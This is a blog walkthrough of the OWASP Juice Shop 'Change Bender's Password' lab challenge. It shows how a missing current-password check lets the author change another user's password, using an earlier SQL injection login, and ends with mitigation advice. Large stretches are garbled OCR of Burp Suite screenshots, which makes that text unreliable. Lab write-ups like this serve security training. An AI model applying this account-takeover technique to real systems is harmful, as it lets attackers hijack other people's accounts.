Hacking OWASP’s Juice Shop Pt. 59: Change Bender’s Password

Challenge: 

Name: Change Bender’s Password

Description: Change Bender’s password into slurmCl4ssic without using SQL Injection or Forgot Password.

Difficulty: 5 star

Category: Broken Authentication

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-authentication.html

Tools used:

Burp Suite, FoxyProxy

Resources used:

None.

Methodology: 

With the expanded description being of very little obvious assistance, I opted to learn how the password changing mechanism worked using an account for which I already had the password.

Request 
Params 
Pretty 
Headers 
Actions 
ISON web Tokens 
ET / rest/ user/ 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o 
application/ j son, text/ plain, 
4 Accept

I was a little surprised to see that the passwords were being passed in cleartext like this, but it being Juice Shop that wasn’t exactly shocking. Now that I knew roughly how the mechanism worked, I logged in as Bender using the SQL injection trick from the Login Bender challenge and started probing. I could have done this with the admin account, but on the off chance I got lucky on my first couple of attempts I didn’t want to waste that luck on the wrong account. After all, knowing that SQL injection was disallowed for this challenge, there were only a few possible weaknesses to test.

Dashboard 
Send 
Request 
Target 
Cancel 
Intruder 
ISON web Tokens 
Sequencer 
Decoder 
Comparer 
Extender 
Project options 
Params 
Headers 
•Actions 
ET / rest/ user/ HIT P/ 1.1 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o 
application/ j son, text/ plain, l/ * 
4 Accept 
S Accept -Language: en-LlS, 
Accept -Encoding: gzip, deflate 
Authorization: Bearer
Dashboard 
Send 
Request 
Target 
Cancel 
Intruder 
_8epeater 
Sequencer 
Decoder 
Comparer 
Extender 
Project options 
User options 
"SON web Tokens 
w Params 
Pretty 
Headers 
Actions v 
ISON web Tokens 
Response 
Headers 
Raw Render 
Pretty 
Logger++ 
_Actions 
ET / rest/ user/ 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; rv. 78.0) Gecko,'20100101 
application/ j son, text/ plain, 
4 Accept 
S Accept -Language: en-lJS, 
Accept -Encoding: gzip, deflate 
Authorization: Bearer 
Hl¯r p / 1 
Fi refox,'78.o 
ey ey oiJzdRNj ZXNz1iwi dXN1 cm shbnuio 
iliLCJ1 b"FpbC161mJ1 b m RI c k aqd'A1 j ZS1zacsvcC1s1nahc3N3b3Jk1j oiTZkN2EOZmNhNzQOMmRkYTNhZDkzYz1 h Nz12hrrk 
3ZTQiLCJyb2x1 Ij oiysvzdG9t bi161i1s1mxhc3Rmb2dpbk1w1j oidnskz,Nzpbmvk1iwicHJvzm1 
ultywdl Ij zxQi oiliLCJpc0Fj d Gl 
2ZS16dHJ1 Z9wiY3J1 YXRI ZEF01j oi Mj Ay McoxMi OwosAxNDo ONDoxNy Awoj Awl iwi dxakYXR1 ZEF01j oi Mj Ay McoxM 
1 OwOSAx YgKz Awoj Awliwi ZGVsZXR1 ZEF01j f 9wi a',NF01j ox Nj e HAi oj E2MDc1 
zWN9. JhNi t2M0eMrYQaT p2ssmKSEK10rsSJhJarZkRDMpRtmUAAK8Lj 9q10iQopvsp4N1sEnwoaLpzveufifR7dKcHx2Svn 
IUgZod1VqNH98gx qAcfLheH7aUN1v9xQZLIQuH800rRSEQozJnsi1Afhzk1j k6RG9MT80q] e,NN20ZE 
10 
Il 
13 
H-rrp/l.1 401 unauthorized 
Access-Cont rol -Allow-Origin: 1 
X-Content -Type-options: nosniff 
SAMEORIGIN 
Feature-policy: payment 
self' 
Content -Type: text 'html; charset=utf- 
Content -Length: 
a-rag: A,' '20-6tKKLCLLgonzR5q1nvJyo/E13vg 
Vary: Accept -Encoding 
Date: Red, 09 Dec 2020 18 11 
32 GI•TT 
Connection: close 
password is not correct

OK, so using the wrong current password yields a 401 response code. What about leaving the current password field empty?

Send 
Request 
Params 
Pretty 
Headers 
'Actions 
"SON web Tokens 
\n 
Response 
Headers 
Render' 
Pretty 
Raw 
200 0K 
Actions v 
ET / rest/ user/ HIT P/ 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o 
application/ j son, text/ plain, 
4 Accept 
S Accept -Language: en-lJS, 
Accept -Encoding: gzip, deflate 
Authorization: Bearer 
ey ey oiJzdRNj ZXNz1iwi dXN1 cm shbnuio 
iliLCJ1 b"FpbC161mJ1 b m RI c k aqdh'l j ZS1zacsvcC1s1nahc3Nsb3Jk1j oiWZkN2EOZmNhNzQOMmRkYTNhZDkzYz1 hNz12NTk 
3ZTQiLCJyb2x1 Ij oiysvzdG9t bi161i1s1mxhc3Rmb2dpbk1w1j oidnskznzpbmvk1iwicHJvzm1 
ultywdl Ij oiYXNzZXRzL381YmxpYy9pbRFnZXMv zxQi oiliLCJpc0Fj d Gl 
2ZS16dHJ1 Z9wiY3J1 YXRI ZEF01j oi Mj Ay McoxMi OwosAxNDo ONDoxNy 4zwcgKz Awoj Awl iwi dxakYXR1 ZEF01j oi Mj Ay MCOxM 
1 OwOSAx YgKz Awoj Awliwi ZGVsZXR1 ZEF01j f 9wi ah'F01j ox Nj e HAi oj E2MDc1 
zWN9. JhNi t2M0eMrYQaT p2ssmKSEK10rsSJhJarZkRDMpRtmUAAK8Lj 9q10iQopvsp4N1sEnwoaLpzveufifR7dKcHx2Svn 
IUgZod1VqNH98gx qAcfLheH7aUN1v9xQZLIQuH800rRSEQozJnsi1Afhzk1j k6RG9W80qj e,NN20ZE 
Connection: close 
Referer: http://localhost : 3000/ 
10 Cookie: language=en; welcomebanner status=dismiss; 
cookieconsent status=dismiss, 
continueCode= 
IxuYhKt 31KT1 RlbTacmF1iqfPSPHeurtt 8cj s J FaiRfvsaunyuNNh88twYcDR1zbCZNig8fwvS7vuvauDxhvot 
8Y1wXTxpsaj UQEHkEhK81Lxc,NSsQSFzMf 8Ksv8UVYH87t La f kaszYHpx, 
Yr3FVXdVyJAgusmfAAA 
E; token= 
ey ey oiJzd',NNj ZXNz1iwi dXN1 cm shbnuio 
iliLCJ1 bh'FpbC161mJ1 b m RI c k aqd',xl j ZS1zacsvcC1s1nahc3Nsb3Jk1j oiWZkN2EOZmNhNzQOMmRkYTNhZDkzYz1 hNz12NTk 
SZTQiLCJyb2x1 Ij oiysvzdG9t bi161i1s1mxhcSRMb2dpbk1w1j 
Lilt Y'Ad1 Ij zxQi oiliLCJpc0Fj d Gl 
2ZS16dHJ1 zswiys-n YXRI ZEF01j oi Mj Ay McoxMi OwosAxNDo ONDoxNy 4zwcgKz Awoj Awliwi dxakYXR1 ZEF01j oi Mj Ay McoxM 
i OwosAx0DowNDoxNC44Mj YgKz Awoj Awliwi ZGVsZXR1 ZEF01j a',NF01j ox Nj A3NTMSMzUzLCJ1 e HAi oj E2MDc1 
zNTN9. JhNi t2M0eMrYQaT p2ssmKSEK10rsSJhJarZkRDMpRtmUAAK8Lj 9q10iQopvsp4N1sEnwoaLpzveufifR7dKcHx2Svn 
10 
13 
Access-Cont rol -Allow-origin: T 
X-Content -Type-options: nosniff 
SAMEORIGIN 
Feature-policy: payment 
self' 
Content -Type: application/ j son; charset=utf-8 
Content -Length: 352 
a-rag: n,' 160-h4hnSKx7cdaocs8+fswdhnapTV1" 
Vary: Accept -Encoding 
Date: Red, 09 Dec 2020 18:12 
Connection: close 
'username 
email " "bender@juice-sh.op , 
password 
'06bocsc1922ed4ed62aS449dd209c96d' , 
'role 
'customer' , 
'del uxeToken 
"lastLoginIp" "undefined' , 
profilelmage 
assets/ public/ images/ uploads/ default 
"totpSecret' 
"isActive" :true, 
svg , 
createdAt " 
'updatedAt " 
'deletedAt' 
'2020-12- 09T14: 44: 17. 317Z" , 
'2020-12- 09T18: 12: 11 824Z" , 
:null

Success!

You successfully solved a challenge: Change Bender's Password (Change Bender's 
password into slurmC14ssic without using SQL Injection or Forgot Password.) 
x

Prevention and Mitigation Strategies:

Don’t transmit passwords in cleartext! Require authentication on the server side to ensure that the current password matches the user-supplied data before updating the password within the user database.

Lessons Learned and Things Worth Mentioning: 

My strategy here was basically to poke the server with a stick until it let me do what I wanted to do. That appears to be a valid strategy!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s